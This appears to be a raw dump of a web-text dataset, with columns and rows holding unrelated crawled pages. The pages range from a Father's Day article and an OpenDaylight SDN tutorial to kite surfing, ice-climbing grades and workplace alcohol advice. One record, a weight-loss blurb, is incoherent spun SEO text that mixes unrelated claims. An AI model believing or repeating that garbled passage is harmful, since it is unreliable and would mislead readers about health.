text
stringlengths
181
608k
id
stringlengths
47
47
dump
stringclasses
3 values
url
stringlengths
13
2.97k
file_path
stringlengths
125
140
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
50
138k
score
float64
1.5
5
int_score
int64
2
5
This is a guest post submitted by Mehwish Younus. All views expressed in this article are of the contributor. He held your hand when you were stumbling and about to fall, he was there at your first parent-teacher meeting to encourage you, he helped you to learn cycling, he kept taking you on camping and fishing trips, he supported you to follow your dreams when no one was ther. He holds a special place in your heart. You are nothing without him, and he is nothing without you. He is your safe place, he is your hero, and you are his champ and princess. He is not a superman but none other than your father. Father’s Day is celebrated on the third Sunday of June every year in most parts of the world. This year it will be celebrated on June 20th. Let us have a look at history to know more about the invention of this day. A brief history of Father’s Day There are two stories behind celebrating Father’s Day. Some say that a woman by the name of Sonora Smart Dodd felt that a day honoring fathers should be marked as her dad William Smart was a widower who raised six children all by himself. According to the other story, a lady named Grace Golden Clayton suggested celebrating this day to the minister of a local church. So, what can you do to this day to honor your favorite man in this world? Presenting a list of things you can do to celebrate and show your love to your father. Watch A Movie There is a bunch of Hollywood and Bollywood movies you can watch along with your daddy; ‘Despicable me,’ ‘Daddy’s Day out,’ ‘Grownups,’ ‘Paa,’ ‘Piku.’ As this is the COVID-era, going out to the cinema is out of the question. You can set up a projector display in your house or watch these movies on Netflix. Make some popcorn and French fries and spend the entire day watching movies with your father. Organize A Brunch On this Father’s Day, cook a special meal for your dad. Make his favorite recipes and set a beautiful table. Let your dad choose the menu. You can also order a cake to make things extra special. Prepare an Ancestral Tree Make a beautiful chart exploring your father’s lineage and gift it to him. This will be a totally unique gift. Give Customized Gifts You can also give your dad some customize gifts. Prepare a beautiful photo book of your memories with your dad, or give him a custom notebook and card with his picture on it. Several online businesses can also do the work for you. Participate in his favorite hobby. Whatever your father likes doing, whether it is reading books or playing scrabble, or even fixing his car, spend quality time with him doing that. He will surely love you for doing it with him. You can come up with activities of your own as well and spend this day loving your hero. Wishing you a very happy Father’s Day! What do you think of the story? Tell us in the comments section below.
<urn:uuid:c672b21e-82b6-4160-9d3b-0b03006f39c2>
CC-MAIN-2022-33
https://www.parhlo.com/happy-father%E2%80%99s-day-to-all-dads-in-the-world
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572021.17/warc/CC-MAIN-20220814083156-20220814113156-00066.warc.gz
en
0.971842
671
1.5625
2
Whether you are looking to quit smoking, drop some pounds, turn into more active or reduce your alcohol consumption, you have come to the precise place. 13. The Four Hour Workweek Podcast Fitness and productivity guru Tim Ferris publishes interviews several instances per week with among the world’s most achieved folks. The plan is designed that can assist you shed weight at a secure fee of 0.5kg to 1kg (1lb to 2lb) every week by sticking to a each day calorie allowance. When consuming out at chain quick food stores, examine the kilojoules listed on the menu and choose the lower kilojoule option. Get online packages, particular charges, and courses provided at our medical facilities to help you live more healthy. You may eat fewer calories and avoid the chemical components, added sugar, and unhealthy fats of packaged and takeout meals that may go away you feeling drained, bloated, and irritable, and exacerbate symptoms of despair, stress, and anxiety. Eating healthy would not must be expensive. In keeping with 2015 research published within the Annals of Inside Medicine , growing your fiber consumption results in extra weight loss than a low-fiber diet—and all it takes is 30 grams of per day. Avocado oil , which has 124 calories per tablespoon, is “loaded with healthy monounsaturated fat and several antioxidants,” Seti mentioned. Observe our strategy to healthy consuming to assist obtain and keep a healthy coronary heart and have the vitality to dwell life to the full. Decreased-calorie, low-calorie or light variations of your favorite meals may be useful, however do not assume this implies that also they are low in salt and sugar. There are no magical meals or methods to mix foods that melt away extra body fat. The Born Fitness group will aid you to identify the diets, methods, exercises, and workouts which might be finest suited to you, as a way to apply them to your life, achieve your objectives, and live stronger and longer. Make a difference: be part of one in all our occasions, have fun and raise very important funds to maintain Australian hearts beating. Every plan is split into three phases designed to help you reduce weight and hold it off.
<urn:uuid:4f0422a4-8929-4dfb-956a-c0fb6709db1b>
CC-MAIN-2022-33
https://www.jerseygirl-movie.com/information-and-pictures-2.html
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571502.25/warc/CC-MAIN-20220811194507-20220811224507-00066.warc.gz
en
0.945192
458
1.773438
2
Do timing and time diversification improve the average investor?s stock market return? Contrary to literature?s scenario of wealthy investors, average investors invest each month over life. Many purchases prevent investors from buying at peak, but horizons decrease, giving latter investments less time to offset losses. This paper accommodates timing using internal rates of return, facilitating the comparison of wealthy and average investors. One to 480 months investments in S&P and downward trending Nikkei, are compared. In conclusion, average investor?s risk and return ratios improve with horizon and, compared to wealthy investors, in bullish and deteriorate in bearish markets. Dollar-weighted return retirement accounts risk cost averaging DCA time diversification
<urn:uuid:3612125e-7679-455f-a29d-509fbcddf031>
CC-MAIN-2017-04
https://www.econstor.eu/handle/10419/96449
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00064-ip-10-171-10-70.ec2.internal.warc.gz
en
0.90073
144
1.648438
2
The OpenDaylight SDN controller Several well-known companies are collaborating on the foundations of future SDN products under the umbrella of the OpenDaylight open source project. The OpenDaylight project , founded in April 2013, is a "community-led, open, industry-supported framework for accelerating adoption, fostering new innovation, reducing risk, and creating a more transparent approach to Software-Defined Networking" (SDN). OpenDaylight operates under the auspices of the Linux Foundation and has the support of major players in the networking industry: Brocade, Cisco, Juniper, and Citrix are in the front row, along with Red Hat, IBM, and Microsoft. The project aims to create a foundation on which the members will then build their SDN products. The code is mainly written in Java and Python and is licensed under the Eclipse Public License (EPL) 1.0. The first tangible result of the collaboration is the Hydrogen release from February 2014. Hydrogen is actually a complete SDN software distribution, because OpenDaylight consists of numerous subprojects that develop individual components. Synchronized semi-annual releases are planned to ensure consistency. At the core of OpenDaylight is the SDN controller. Its components share a Java Runtime and communicate with each other via function calls. Below this control layer is the southbound interface (as shown in Figure 1), where everything that is more tangible than the control plane resides. Plugins for several protocols that are used to control the data plane with their network devices dock onto the Service Abstraction Layer (SAL), the controller's and the plugin manager's lowest abstraction layer. This multiprotocol support is an important goal of the project and explains why you will also find other plugins for OpenFlow (versions 1.0 and 1.3), the Netconf standard, and the OVSDB management protocol for Open vSwitch here – after all, the network equipment can also be virtualized. In the opposite direction lies the northbound interface, which forms the connection to more abstract things: network applications and management and orchestration software. It includes the OpenStack component Neutron, which establishes network connections for the guests of cloud computing frameworks. The controller uses a REST API to communicate with this type of software. If you are interested in getting started with OpenDaylight, your best approach is to deploy the software in a simulated network, and the free Mininet software is perfect for this purpose (see the Mininet story in this issue). Conveniently, the project offers Linux virtual appliances with Mininet preinstalled . They can operate with different virtualization technologies; the developers recommend VirtualBox. Recent versions have occasionally shown problems with the OVF files provided, so it is advisable to create an Ubuntu VM manually with 1GB of RAM and assign the downloaded VMDK image to it. While the virtual machine is booting, the administrator can install the OpenDaylight controller. The prerequisite for doing so is Java 7. You can download RPM packages and ZIP files from the website; the basic edition is fine. Linux virtual appliances and docker containers are also available. In a distribution-neutral installation from the ZIP file, you need to run the startup script from the directory created by unpacking with: With OpenDaylight running and a Mininet VM ready for action, you can try out a simple forwarding example from the project wiki . On the virtual machine console, the user mininet logs in with mininet as the password. Then, run the following command to create a simple network with a tree-like arrangement of switches at three levels: sudo mn --controller=remote,ip=<IPaddress> --topo tree,3 <IPaddress> wildcard with the externally accessible address of the host on which OpenDaylight is running. The URL for the SDN controller's web interface is http://<IPaddress>:8080; the username and password are both admin. The graphical representation in the browser (Figure 2) shows the seven emulated switches that look a little messed up. You can simply drag and drop to arrange them more clearly. Under the network diagram, you'll find the blue button Add Gateway IP Address, which you can then populate with an IP address and subnet mask, such as 10.0.0.254/8. At the Mininet VM console, you can now ping one virtual host from another, for example, using h1 ping h7. Then, switch back to the web interface and go to the Troubleshoot tab. Under Existing Nodes, you can select a node and then view Flows or Ports for detailed information about its connections. These examples by no means exhaust OpenDaylight's capabilities. The software can be clustered, and it also supports remote access via the Java Management Extensions (JMX). The Service Provider Edition of the software also adds plugins for the BGP, PCEP, and SNMP4SDN protocols. Also available is a Virtualization Edition with a Virtual Tenant Manager (VTN), which ties in with the Neutron network component in OpenStack. If you are not part of the developer community of participating companies , you will probably find it difficult to come to grips with OpenDaylight. The documentation on the wiki is very fragmentary and often out of date. It remains to be seen whether this situation will improve or whether customers will be forced to rely on polished products by the manufacturers involved. - OpenDaylight: http://www.opendaylight.org - Mininet VMs: http://mininet.org/download/ - OpenDaylight downloads: http://www.opendaylight.org/software/downloads - Installation and getting started: https://wiki.opendaylight.org/view/OpenDaylight_Controller:Installation - OpenDaylight Summit: http://events.linuxfoundation.org/events/opendaylight-summit Buy this article as PDF Makes it easier for customers to move workloads into container-centric applications. SUSE’s answer to container-centric operating systems. Linux 4.9 is the biggest release in terms of number of commits. The latest version of the official RHEL clone is here. New release targets Linux professionals. The Fedora project adds Wayland and Gnome 3.22 CeBIT 2017: Open Source Forum Call for Papers Long-time Linux antagonist joins the revolution. Major bug affects Debian/Ubuntu distributions. Canonical releases the minimal edition for embedded devices, Internet of Things, and cloud deployments.
<urn:uuid:7a1cf116-ced8-4e92-a82a-05fa5e1f06fa>
CC-MAIN-2017-04
http://www.linuxpromagazine.com/Issues/2014/162/OpenDaylight/(tagID)/31
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00564-ip-10-171-10-70.ec2.internal.warc.gz
en
0.882584
1,368
1.679688
2
Shoppers ages 50-54 lead the charge when it comes to purchasing health and beauty products online (52 percent), and shoppers ages 45-49 are purchasing more food and beverage products online (29 percent) than any other age group, according to The Checkout, an ongoing shopper behavior study conducted by The Integer Group and M/A/R/C Research. All age groups show an increase in shopping online, with an overall increase in shopping in general — in contrast to The Checkout’s results from last year that showed 73 percent of shoppers who were buying more online, were not shopping more, they were just shopping differently. Last year, The Checkout also showed that Boomers were the largest group of shoppers purchasing consumer packaged goods (CPG) products online (health, beauty, food, beverage). Both reports indicate that other age groups still aren’t sold on the idea of doing standard grocery shopping online, stating that their barriers for purchasing these goods online are product expiration dates and shipping costs. “Grocery shopping online is a concept most shoppers have yet to adopt, which means there are conventions ingrained in their shopping behavior that must be disrupted,” said Craig Elston, senior vice president, Integer. “Manufacturers and e-tailers have the most to gain if they can help shoppers get over their purchase barriers.”
<urn:uuid:eb544bdb-bac5-4097-9303-72e027ab00fc>
CC-MAIN-2017-04
http://merchandisingmatters.com/2012/02/13/boomers-buying-more-online-products-gen-y/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00140-ip-10-171-10-70.ec2.internal.warc.gz
en
0.969493
280
1.960938
2
Why Lesson Planet? Find quality lesson planning resources, fast! Share & remix collections to collaborate. Organize your curriculum with collections. Easy! Have time to be more creative & energetic with your students! Fourth graders describe how Michigan has changed and stayed the same over time. They explain reasons why people settled/settle in Michigan, then explain the role of geography on the settlement of Michigan. 3 Views 2 Downloads
<urn:uuid:f2585e1d-b8cd-4a85-af44-f136e43f4011>
CC-MAIN-2017-04
https://www.lessonplanet.com/teachers/town-growth-and-immigration
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00348-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92282
90
3.53125
4
Birding enthusiasts attending the Lake Apopka Birding Festival will hope for sightings of winged creatures such as the groove-billed ani, an odd-looking bird with a curved beak and long tail, and the fulvous whistling duck, noted for its long legs and neck along with a white band across its black tail in flight. Sponsored by the Orange Audubon Society, the event is based out of the McDonald Canal area on the Lake County side of the 20,000-acre Lake Apopka north shore and features field trips there and at other Central Florida sites Friday, Jan. 19, through Sunday, Jan. 21. Experts including noted Ohio birder Greg Miller — the inspiration for the 2011 movie “The Big Year,” with Jack Black playing a character based on him — will give participants a chance to search for more than 360 species documented in the area. Festival chairwoman Deborah Green of Longwood said those who attend are in for a treat. “It really is a special place for birding,” said Green, retired founding director of sustainability at Valencia College. Ornithologist Gian Basili of the U.S. Fish and Wildlife Service, who helped shepherd north shore restoration efforts, will kick off the event with a keynote address Thursday, Jan. 18, in the Camellia Room at Leu Gardens, 1920 N. Forest Ave., Orlando. A meet-and-greet will be at 6:30 with a program at 7 p.m. There is no cost but donations are appreciated. This is the second year for a full-fledged festival after a “pilot” event in 2016, Green said. Plans again called for it to be wrapped around the Lake Apopka Wildlife Festival and Birdapalooza at Magnolia Park in Orange County. However, Birdapalooza was canceled this year because of damage from Hurricane Irma and concerns that the popular Lake Apopka Wildlife Drive may not reopen for months. Despite the uncertainty, as it turned out the scenic drive was reopened just before Christmas. The McDonald Canal area, off County Road 448A, was less impacted, Green said, and plans could go forward with the birding festival, which is co-sponsored by Lake County’s Oklawaha Valley Audubon Society. The McDonald Canal, 24600 County Road 448A, is the meeting place for 15 field trips. They include a waterfowl trip from 7:30 to 11:30 a.m. Friday led by Bruce Anderson, co-author of “The Birdlife of Florida,” and Orange Audubon’s Tom Rodriguez. Cost is $30. Sunrise photography trips will take place from 5:30 to 11 a.m. all three days. The cost is also $30. Miller will lead five trips. A Dora Canal boat tour is filled but spots remain for other trips including “Birding by Ear” from 7 to 11 a.m. Saturday. In addition to the McDonald Canal, another Lake County site, the Ferndale Preserve, 9220 County Road 455, Clermont, is the meeting spot for “Sparrows, Buntings and other Wintering Birds” from 7:30 to 11 a.m. Friday. For more information about the festival, go to orangeaudubonfl.org/festival. For a list of events and to sign up, go to bit.ly/2EmObMP. email@example.com or 352-742-5916
<urn:uuid:e097d38e-3b4b-4f1e-b93e-68df5836f582>
CC-MAIN-2022-33
https://www.orlandosentinel.com/news/lake/os-lk-lake-apopka-birding-festival-20180108-story.html
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573623.4/warc/CC-MAIN-20220819035957-20220819065957-00674.warc.gz
en
0.943784
753
1.773438
2
Breakfast: Cholle Bathure Lunch: Kadai paneer with rumali roti and lassi Brunch: Samosas and pakoras Snacks: Momos and smoothie Dinner: Chapati, chawal, and rajma Next day: Mom my stomach aches, I don’t know why! The above is a perfect example of how, we Indians, pounce on food. Yet we are convinced that it is not our eating habits but other factors that make us fall ill. This is one of the many misconceptions we procure in our brains about our digestive health. This list of myths is a lengthy one. But we got a hold of a few and brought you the answers from one of the finest specialist. We spoke with Dr. Kunal Das, Head of the Department of Gastrointestinal Sciences at Manipal Hospitals Dwarka. Read on our interaction where he busts some common myths relating to digestive health. Common Misconceptions about Gastroenterological Problems Myth 1 – Spicy foods cause ulcers. Fact – No, spicy food doesn’t cause ulcers. But if you have already developed ulcers then it is advised that you avoid spicy foods. If you have ulcers you should take adequate food and avoid spices. Rest assured if you don’t have ulcers you can enjoy your chili paneer tikka. Myth 2 – Digestive problems like constipation are common as one grows older. Fact – This misconception is famous perhaps because old people do not have enough mobility. It may also be the fact that they do not consume enough food or have geriatric problems. They may not be taking adequate amount of fibers either. So, the main problem is mobility, food, water, and fibers. If you take a good amount of fiber in your diet, for instance, if you eat a bowl of salad or lots of fruits and green vegetables, and drink juices, then constipation can be prevented. Practicing healthy eating habits and doing some physical activity is the key. If you do so, then don’t worry you will not have constipation. Myth 3 – Milk or tea cannot be digested easily and thus makes a person suffer from gas. Fact – Not everybody suffers from gas by taking milk. The patients who are intolerant to milk, in other words, lactose intolerant, tend to have this condition. Milk has a sugar carbohydrate called lactose. Sometimes it cannot be digested. Some people lack an enzyme called renin, which helps to digest lactose. Only those groups of patients are lactose intolerant. When you take milk in this condition, it doesn’t get digested and gets converted into curd and acid in your body. As a result, one gets a lot of gas. If you are lactose intolerant, do not consume milk. Myth 4 – Medicines for acid reflux should be taken for life. Fact – This is a very common problem and an even more common question. My answer is that medicines are helpful but they are not the only solution to treat acid reflux. We must have a 360-degree thought process about the treatment of acid reflux. We also recommend a good diet. You must avoid milk, tea, coffee, citric fruits and juices like lemon, orange, mausami, pickles, tamarind, amla, and too much fat. These products need a lot of acid to digest. If you take a good diet and release the stress out of your body by doing yoga and meditation, this ailment can be treated completely. Mainly, if you have good food and a healthy lifestyle, you can treat acid without medicines also. Kick the acid out of your life and have a healthy life without medicines. Myth 5 – People believe that chest pain can only be a symptom of cardiac problems. Fact – Chest pain can be of many causes. Cardiac is a very important cause. And the typical cardiac pain is exertional. It is felt when you walk or climb stairs or run. The pain felt after an exertional activity is mostly of cardiac origin. But this is not the only cause of chest pain. There are many other causes like pneumonitis, esophageal motility disorders, muscular chest pain or even acidity and gas, which can cause retrosternal chest pain. Non-cardiac chest pains are very important components. Cardiac chest pain constitutes a minority of chest pain. It is close to 30%. The important way to diagnose it is by associating it with any exertional activity. If the pain is a result of such activity as walking down the street or running, then it is cardiac. All other chest pains are non-cardiac in origin. Myth 6 – Common belief among smokers is that smoking cigarettes boosts digestion. Fact – This is completely incorrect. Smoking doesn’t cause improvement in one’s digestion. Some people tend to feel relaxed at a stressful time after smoking a cigarette. The only association is with how they feel. Smoking doesn’t improve digestion. On the contrary, smoking increases acidity, gas and hampers one’s digestion. It is an incorrect statement with no medical basis. Indian delicacies are as diverse and delicious as they can get. Many treats can be equalized with more number of myths. In this post, we have shattered some of the most common misconceptions that surface in our society. We urge you to entrust the expertise of Dr. Kunal Das and follow a doctor’s advice on medical queries, instead of heeding to misbeliefs. For a priority appointment or more information, contact us at +91 8010994994 or book an appointment with Dr. Kunal Das here – [button color=”transparent_credi” size=”medium” class = “custom_button” link=”https://www.credihealth.com/doctor/kunal-das-gastroenterologist/overview” icon=”” target=”true”]Book Appointment [/button] This write-up was contributed to Credihealth by Dr. Kunal Das. About The Doctor Dr. Kunal Das is the HOD & Consultant Gastroenterology at Manipal Hospitals, Dwarka. He has an experience of 16 years in this field. He completed his MBBS and post-graduation in medicine from Maulana Azad Medical College, New Delhi and D.M.(Gastroenterology) from G.B.Pant Hospital. Dr das also underwent endoscopic ultrasound training from Kinki University, Japan.
<urn:uuid:b1eda95e-5d5e-4819-a937-aad25b47f8e8>
CC-MAIN-2022-33
https://www.credihealth.com/blog/creditalk-digestive-myths-by-dr-kunal-das/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573540.20/warc/CC-MAIN-20220819005802-20220819035802-00474.warc.gz
en
0.928841
1,419
2.3125
2
Rick Jensen straightened up inside his wetsuit, pushed his broad shoulders back, and looked at the sky. "It's blowing about five. Just," he said. "It'd be better if it was more." A northwesterly wind is pushing clouds southeast and their shadows race across the beach on Sylt, Germany's northernmost island. Jensen caps his air pump. Only a few strokes and the colorful canvas in the sand has changed into a kite, in the shape of a giant C. At each corner, the 21-year-old tied his flying lines, with which he would steer the kite. Then he attached the "control bar," a sort of handlebar, to a harness which hung low around his waist, skimming his hips. A helper raised the kite, Jensen pulled quickly on his lines and 10 square meters of canvas wafted silently skywards. Bent over a little against the wind, he dragged his monster kite toward the water. There, where the waves were breaking, Jensen dropped his board onto the sand and climbed boots mounted on the board. Then he leaned backwards -- his entire 90 kilos, all muscle. The kite began to nose dive, then stopped, then caught the wind and started to scud powerfully out to sea. Jensen pushed the edge of his board into the surf and raced away, following his kite out to sea. Spectacular Sport That's More Popular Than Windsurfing This is kite surfing. A spectacular sport that's a mixture of kite flying and wind surfing. Ten years after it was invented, kite surfing is almost more popular than wind surfing. An estimated 30,000 kite surfers now shred the waves around Germany's coasts and on German lakes. And of those, a mere 20 can call themselves professionals. Jensen is one of them. Over the past six years his kite has barely hit the ground. Sun and salt water have bleached his golden hair even blonder. In surfing circles he's known as one of the best -- he has been German junior champion twice already. And he plans to prove it again at the end of this month, when the best kite surfers on earth meet at the world championships in St. Peter-Ording off the north coast of Germany. Jensen's kite flew relatively flat over the sea; this way he gets the most pulling power. It swept Jensen along as though it were a jet boat and he a water skier. And Jensen maneuvered the wakeboard through the waves as though it were some kind of converted mono-water-ski. Jumps are a specialty of his. He whipped the board out of the water, twisted into a back flip and did a complete 360 degree turn without stopping, while passing the handle from one hand to the other behind his back, before hitting the water again in a spray of foam. High Winds And Acrobatic Skills Required With kite surfing there are two classic kinds of competition. One involves running a straightforward race on a set course. The other is a race with a thrilling difference, known as "freestyle." The winner is the surfer who can put together the fastest, most acrobatic and most artistic run. This is why Jensen is currently trying to learn the "Mobe 7." Wakeboarding Web sites describe this complicated move as a Backmobe (which involves several aerial backward rolls) "followed by a 360 degree frontside handle pass." It is, they say, "one of the most advanced handle pass tricks, where the rider has to pass the bar two times before landing." Such a move will score big points in competition. "Kite surfing isn't that hard to learn," Jensen said. "You start jumping your board a lot faster than you do, if you're learning to windsurf." But obviously there's a world of practice between those first little jumps and what is known as a "kite loop." "You need a lot more wind for that," Jensen explained. "Seven on the Beaufort would be good," he said, referring to the Beaufort wind force scale; seven on this scale is a high wind, between 50 and 60 kilometers per hour. During such a trick, the kite loops while the rider is spinning out of the water. "You can easily get 15 meters high, then you dive down again -- it's better than a rollercoaster," Jensen enthused. There are only a few people in the world that can do this trick with confidence. The Professional Who Lives In A Rusty VW Van And because Jensen is one of those people, his sponsor doesn't only provide him with the latest equipment, they also give him a travel budget. "I actually still live with my parents in Pinneburg," a city near Hamburg, he said. "But last year I was only home for about two weeks." Basically his rusty old VW bus is his main place of residence. "If the wind is blowing then I'll either be on the water or somewhere between St. Peter-Ording and Fehmarn," he said. "And in winter I'll be driving to Cape Town to train." One relationship has already been sacrificed to this way of life. "Among other things," Jensen noted. His sponsor is the company that belongs to American windsurfing legend Robby Naish. Naish won his first world windsurfing title at the age of 13 but then took up kite surfing and went on to win the kite boarding slalom world title at the age of 35. Naish is Jensen's hero: "Nobody is as radical as he is." Unlike windsurfing, where the fan base has grown older, kite surfing is a young sport. On the German coast the numbers of windsurfer's sails have decreased -- and they have been replaced by swarms of kites, whipping back and forth across the summer skies. Now Jensen hunted for a wave to take him back to shore, he held the kite with one hand and got hooked on a watery snag. The foam flies. But this time he had guessed wrong and he crashed while his kite landed between spectators on the beach. German Women's Kite Surfing Champion Killed And therein lies the catch with this wind borne pastime. "Kite surfing is still pretty dangerous," Jensen admitted. Seven years ago the sport made headlines when two entangled kites dragged Silke Gorldt, the German women's champion at the time, to her death -- she was pulled onto safety fences on the beach and died of internal injuries on the way to hospital. Since then manufacturers have tried to make kite surfing less dangerous, with the introduction of kite leashes, safety harnesses and various quick release features. Even so, a kite surfer died in South Africa this month when he was thrown against boulders and in June, two kite surfers in Italy were lifted out of the water by high winds and thrown against a car and a building. One was killed as a result. In the Internet you'll also see some hair raising videos of kite surfing accidents: wind gusts lift kite surfers so high they seem to disappear over the horizon, until they finally make a hard landing. Which is why the professional surfers suggest that manufacturers come up with some sort of universal safety-release mechanism. At the moment, every brand has their own system for allowing riders to separate themselves from their kite in an emergency. "But it should be the same sort of handgrip for everyone, so that you can do this (release yourself) by reflex," Jensen argued. "After all, the brakes are always in the same place in a car." Jensen himself has experienced the bloody dangers of kite surfing. You can actually find pictures of the hole he tore in his derriere online. He's laughing about it in the YouTube video but it looks nasty. It happened last autumn. Jensen was trying to do a "grind" -- a trick from skateboarding that involves sliding ones' board across a railing or some other solid obstacle -- over an old metal railing, part of an old swimming platform off the beach at Fehmarn. "What you do is jump your board onto a railing and let it slide along. But suddenly there was a screw there that I hadn't seen beforehand," Jensen explained. A visit to the doctor and 16 stitches later, his rear end was whole again. Working With Wind Power In More Ways Than One This autumn, Jensen is going to need that rear end -- to sit on. He will be starting an engineering course at university. And obviously he'll be studying in Kiel, the capital of the northern state of Schleswig-Holstein, which also happens to be the capital of German kite surfing. So, afternoons will be spent on the Baltic Sea beaches, then? Jensen shook his head. "I need to take my studies seriously. I've been going so hard with kite surfing up until now that it's no contest as to which comes first." But no matter what he says, it seems he cannot stay away from wind and water. His dream job: to work for German company Enercon, where he's just applied to do an internship. And what do they do? Among other things, the company, a world leader in wind energy, build off-shore wind farms. Of course.
<urn:uuid:ab6ec114-a9ab-4645-9bce-1035706655f9>
CC-MAIN-2017-04
http://abcnews.go.com/International/story?id=8237563&page=1
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00008-ip-10-171-10-70.ec2.internal.warc.gz
en
0.978962
1,938
1.625
2
|[back to Ice]| This grade indicates the overall difficulty of the climb. It takes into account the climbs length, its seriousness and the ease of approach and descent. I. Short climb, well-protected, fixed belays, easy descent, quick walk-in. Not particularly demanding II. One or two pitches, well-protected, fixed belays, descent on easy terrain, quick walk-in. Not particularly demanding nor dangerous. III. Multi-pitch climb that requires a couple of hours to climb or to walk-in (possibly with skis). Good knowledge of the winter mountain environment essential. No fixed belays. Descent usually via abseil down the route. IV. Long multi-pitch route in alpine environment. Good knowledge of the winter mountain environment essential. The walk-in may be prone to ice and/or stone falls, and/or avalanches. Difficult descent; abseils need to be rigged. V. Long, sustained and demanding multi-pitch route. Danger of rock/ice/avalanches, demanding descent. Few repeats. VI. Extremely long and isolated climb, difficult to repeat in just one day. Difficult approach and descent, and difficult to turn back once on the route. The hardest ice routes in the Alps and the world are currently accounted for in this grade. VII. As for No. VI, but harder still. There are few routes of this grade at present. This grade refers to the technical difficulties of the pitch and takes into account the angle of the ice-fall, whether the climbing is sustained or not, the nature of the falls formation, and the nature of its protection. 1. Easy angled ice that has no particularly hard sections. 2. Easily protected pitch on good ice. 3. Some 80º sections but on thick, compact ice, with comfortable, well-protected belays. 4. Sustained and near-vertical pitch, or a short pitch with a short, vertical section. Good ice and satisfactory gear. 5. Sustained and nearly always vertical pitch up discreet ice, or a less sustained pitch that is technically more demanding. Few rests. 6. Very sustained pitch that offers no rests at all. Difficult ice; some overlaps and other formations require good technique. Protection difficult to place and often of dubious nature. 7. Very sustained pitch that offers no rests at all. Extremely fragile and technically difficult ice. Protection run-out or non-existent. The letter "X" refers to particularly fragile formations, while "R" indicates thin ice.
<urn:uuid:519ab612-157c-41dd-ab53-1ac33450fb28>
CC-MAIN-2022-33
https://www.planetmountain.com/English/Ice/diff/diff.html
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571758.42/warc/CC-MAIN-20220812200804-20220812230804-00669.warc.gz
en
0.926434
555
2.40625
2
Published in the immediate aftermath of the Second World War, Mises’ magnum opus, Human Action (1949) contained a chapter on "The Economics of War" in which he laments the killing of innocents: How far we are today from the rules of international law developed in the age of limited warfare! Modern war is merciless, it does not spare pregnant women or infants; it is indiscriminate killing and destroying. It does not respect the rights of neutrals. Millions are killed, enslaved, or expelled from the dwelling places in which their ancestors lived for centuries. Nobody can foretell what will happen in the next chapter of this endless struggle. About this Quotation: Mises had the very great misfortune of living through the two world wars of the 20th century and seeing first hand the impact war had on the destruction of life and property. During the First World War he worked as an economic advisor to various private and government bodies in Austria on banking matters and could thus see the terrible inflations which ruined eastern and central Europe, especially in Russia and Germany. During the Second World War he was able to seek refuge in Switzerland before coming to the United States. The problems of war and inflation were a central concern in all his writings.
<urn:uuid:8a0c0f78-7ec8-4e15-9672-1801bb84c8e4>
CC-MAIN-2017-04
http://oll.libertyfund.org/quote/27?option=com_staticxt&staticfile=quotes.php&Itemid=275
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282926.64/warc/CC-MAIN-20170116095122-00395-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96835
255
3.1875
3
Did you know that alcohol causes 17 million sick days in the UK every year? Many people use alcohol to relax, reduce stress, and ease pressures, but it’s worth noting that excessive drinking can negatively affect wellbeing, physical health, and work productivity. More importantly, research shows one in five UK adults risk damaging their health by regularly drinking more than the Chief Medical Officers’ low-risk drinking guidelines. With this in mind, it’s more vital than ever for your organisation to be aware of alcohol misuse and to signpost your staff to appropriate support. Because you’re in a strong position to engage your team, now is the time to raise awareness and help your workplace establish healthier routines. You can support your employees and promote awareness by following these eight top tips. 1. Promote responsible drinking Public awareness of alcohol consumption is changing. However, many people still are unaware that they are drinking over the limit and that it affects their health. Especially considering almost 31 percent of drinkers in the UK are drinking at increasing or high risk levels. To combat lack of awareness, offer tools for employees to check how much they drink. For instance, tests like the Drink Aware Alcohol Self-Assessment will show them if their drinking puts them at low risk or harm or if they need to take action to reduce the amount they drink. Additionally, apps like MyDrinkaware can monitor alcohol consumption over time, measuring units, calories and sleep quality. Ultimately, this helps employees moderate their drinking, leading to a better mood and a healthier lifestyle. Want to find out more? Join our Drinkaware webinar 2. Lay out the facts about alcohol Do you struggle to explain the facts about alcohol alone? Introduce e-learning courses to your wellbeing initiative so employees can learn about the effects of alcohol and its related harm. More specifically, e-learning provides employees with the essential facts about alcohol. As a result, they will be able to make good decisions regarding their consumption of alcohol. The knowledge they gain can also help reduce the risk of them endangering themselves or others. In addition, e-learning can be integrated with existing Learning Management Systems or hosted by charities such as Drinkaware, which track course progress and scores. Better yet, you can incorporate these into your health and wellness programs or health and safety training. 3. Train your managers Although you may have specific policies, your current training might not be sufficient for managers to deal with workplace alcohol misuse efficiently. It is worth investing in management training and awareness to prevent alcohol-related mishaps in the workplace. After being referred for support, 69 percent of employees continue to work at their organisation. Some top tips for planning training for line managers include: - Make clear the crucial role line managers play. Managers are in the best position to spot early warning signs and provide support, but they need the training to feel able to do so effectively. - Train managers on your alcohol policies. A good start is to remind them of your own alcohol policy and procedures, then provide training that covers: how to avoid developing a drink culture (such as monitoring stress levels and workloads), the problems alcohol can cause, best ways to support individuals with different types of alcohol issues and dealing with disclosure from employees. Managers would not be expected to assume an expert role but raising awareness will play a crucial part in building a supportive culture. - Cover health and safety considerations. Plan a course of action with managers should an incident occur so that they can contribute to any risk assessments. - Provide a point of contact. Provide a key HR contact who can offer online resources and support for managers as needed, as well as send them to courses. - Consider work adjustments. Make line managers aware of how they can provide accommodations for individuals who struggle to get support. For example, flexible working options or role adjustments. - Review working practices. Assess whether your current practices support staff wellbeing and rethink the nature of work socialising to ensure it is inclusive. 4. Invest in accessible mental health support Did you know about 1 in 4 people in the 